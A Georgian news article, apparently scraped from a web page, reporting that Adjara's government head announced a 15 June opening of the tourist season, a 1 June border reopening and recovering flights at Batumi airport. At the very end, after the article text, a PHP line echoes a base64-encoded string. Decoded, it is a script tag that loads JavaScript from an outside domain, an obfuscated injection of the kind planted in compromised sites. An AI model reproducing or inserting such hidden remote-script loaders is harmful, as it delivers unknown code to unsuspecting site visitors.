celsiusi
ავერსი შნაიდერი
აჭარის რეგიონში ტურისტული სეზონი ოფიციალურად 15 ივნისს გაიხსნება. ამის შესახებ აჭარის ავტონომიური რესპუბლიკის მთავრობის თავმჯდომარე თორნიკე რიჟვაძემ დღეს გამართულ მთავრობის სხდომაზე განაცხადა.
 
თორნიკე რიჟვაძემ მოახლოებული ტურისტული სეზონის მოსამზადებელი სამუშაოების, ეკონომიკის თანმიმდევრული გახსნის და უსაფრთხო სეზონის უზრუნველყოფის შესახებ გააკეთა ისაუბრა და აღნიშნა, რომ ტურიზმის უსაფრთხოდ გახსნა ეკონომიკის აღდგენისა და ეპიდვითარების სტაბილობისთვის მნიშვნელოვანია.
 
„საკოორდინაციო საბჭოს გადაწყვეტილებით, უკვე პირველი ივნისიდან იხსნება სახმელეთო საზღვრები, რაც რეგიონში ტურიზმის სწრაფი აღდგენის საშუალებას მოგვცემს. ამიტომ ყველა შესაბამის უწყებას მინდა ვთხოვო, რომ ტურისტული სეზონისთვის მაქსიმალურად მოემზადოს, იქნება ეს ტურისტული ატრაქციები თუ ზოგადად ქალაქის ინფრასტრუქტურა. ახლა ქალაქის მომზადება იმ მზარდი ნაკადებისთვის, რომელიც ჩვენ აუცილებლად გვექნება მიმდინარე სეზონზე განსაკუთრებულად მნიშვნელოვანია. ასევე მინდა ვთხოვო ტურიზმის დეპარტამენტს და ყველა სხვა უწყებას, რომ 15 ივნისისთვის სეზონი ოფიციალურად გავხსნათ და ეს ყველაფერი მაქსიმალური სიფრთხილით, ეპიდემიოლოგების რეკომენდაციების გათვალისწინებით უნდა გაკეთდეს, რათა ეკონომიკასთან ერთად სტაბილური ეპიდვითარება შევინარჩუნოთ“, - განაცხადა თორნიკე რიჟვაძემ.
 
აჭარის მთავრობის თავმჯდომარის განცხადებით, განახლებულ ბათუმის საერთაშორისო აეროპორტში საჰაერო ფრენები აღდგენის პროცესშია.
 
„გაიზარდა ნაკადები ბათუმის საერთაშორისო აეროპორტში. გასული თვის მონაცემებით ნაკადები 60% -ით აღდგა და ყოველკვირეულად 60-ზე მეტი რეისი სრულდება, რაც ძალიან პოზიტიური დინამიკაა“, - აღნიშნა აჭარის მთავრობის თავმჯდომარემ.
 
აჭარაში აქტიურად მიმდინარეობს ტურისტული ინფრასტრუქტურისა და პროდუქტების განვითარების კუთხით პროექტები და როგორც მთავრობის თავმჯდომარემ აღნიშნა, მნიშვნელოვანია, ახალი ტურისტული ატრაქციები არა მხოლოდ ბათუმში, არამედ ყველა მუნიციპალიტეტში იქმნება.
1393
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");